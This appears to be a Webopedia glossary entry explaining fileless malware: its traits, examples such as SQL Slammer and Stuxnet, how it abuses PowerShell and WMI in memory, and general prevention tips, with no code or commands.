Fileless Malware Meaning & Definition

Fileless malware is a type of malicious software that uses legitimate applications already installed to infect a computer. It doesn’t rely on files and doesn’t leave a footprint since the malware is memory-based and not file-based. Fileless malware doesn’t require code to be installed, but an attacker still needs to be able to gain access to the environment to modify the native tools already in a user’s operating system. This fileless technique of using native tools to conduct a malicious attack is known as “living off the land.”

Common characteristics of a fileless malware attack include:

  • Leverages approved applications that are already within the system
  • Does not have identifiable or detectable code
  • Does not have identifiable behavior
  • Is memory-based—it lives in the system’s memory
  • Uses processes that are built into the operating system
  • Is paired with other types of malware
  • Remains in an environment despite whitelisting and sandboxing efforts

Well known fileless malware attacks include:

  • SQL Slammer: A 2003 attack that exploited a vulnerability in Microsoft SQL servers and caused a Denial of Service (DoS) on internet hosts and dramatically slowed general internet traffic.
  • Stuxnet: First uncovered in 2010 but thought to be in development since 2005, a worm designed to infect nuclear enrichment systems. Stuxnet is believed to be responsible for causing damage to the nuclear program of Iran.
  • UIWIZ: A threat discovered in 2017 that exploited the same vulnerabilities as the WannaCry ransomware attack, but was fileless.

How fileless malware works

Fileless malware attacks use existing vulnerabilities already installed on a computer to infiltrate, take control, and carry out the attack. It doesn’t need to be installed or downloaded. A fileless attack may be triggered by a user-initiated action, such as clicking an advertisement that redirects to access Flash, and then uses other applications on the device.

Once into the system, specifically in the computer’s RAM, the malware injects malicious code. It gains access to native Windows tools, such as PowerShell and Windows Management Instrumentation (WMI) and injects code. These tools are targeted because they carry out system tasks for multiple endpoints.

This type of malware exists only in a computer’s RAM, meaning nothing is written directly to the hard drive. While this means an attacker has a smaller window of opportunity to execute the attack if a system reboot were to occur, it also means it’s more difficult to detect because there are no stored files for defensive security software to scan.

How to prevent fileless malware

While fileless malware attacks are difficult to detect, it’s not impossible, and they do leave traces of evidence behind, including a compromise in a device’s system memory. Some antivirus software provides analytics that can detect when an application is executed at the same time as PowerShell. To minimize risk, consider using these approaches:

  • Disable PowerShell and WMI if they’re not in use
  • Disable macros if not in use
  • Regularly check security logs for inordinate amounts of data leaving the network
  • Secure system endpoints
  • Looks for changes in the system’s behavioral patterns
  • Update software regularly
  • If an attack has occured, change system passwords

 

Related Links

Abby Dykes
Abby Dykes
Abby Dykes is a writer and editor for websites such as TechnologyAdvice.com, Webopedia.com, and Project-Management.com, where she covers technology trends and enterprise and SMB project management platforms. When she’s not writing about technology, she enjoys giving too many treats to her dog and coaching part-time at her local gym.

Top Articles

The Complete List of 1500+ Common Text Abbreviations & Acronyms

Text Abbreviations reviewed by Web Webster   From A3 to ZZZ we list 1,559 SMS, online chat, and text abbreviations to help you translate and understand...

How to Create a Website Shortcut on Your Desktop

Website Shortcut on Your Desktop reviewed by Web Webster   This Webopedia guide will show you how to create a website shortcut on your desktop using...

Windows Operating System History & Versions

The Windows operating system (Windows OS) refers to a family of operating systems developed by Microsoft Corporation. We look at the history of Windows...

First to Fifth Generations of Computers

Reviewed by Web Webster   Learn about each of the 5 generations of computers and major technology developments that have led to the computing devices that...

Heuristic Definition and Meaning

Heuristic, pronounced hyoo-ri-stihk, is a Greek term for individually finding or discovering. In...

Hackerspace Definition & Meaning

What is a hackerspace? A hackerspace, also known as a hacklab, incubator, or hackspace,...

Random Access Memory (RAM)...

Random Access Memory (RAM) reviewed by Web Webster   Random Access Memory (RAM) is a...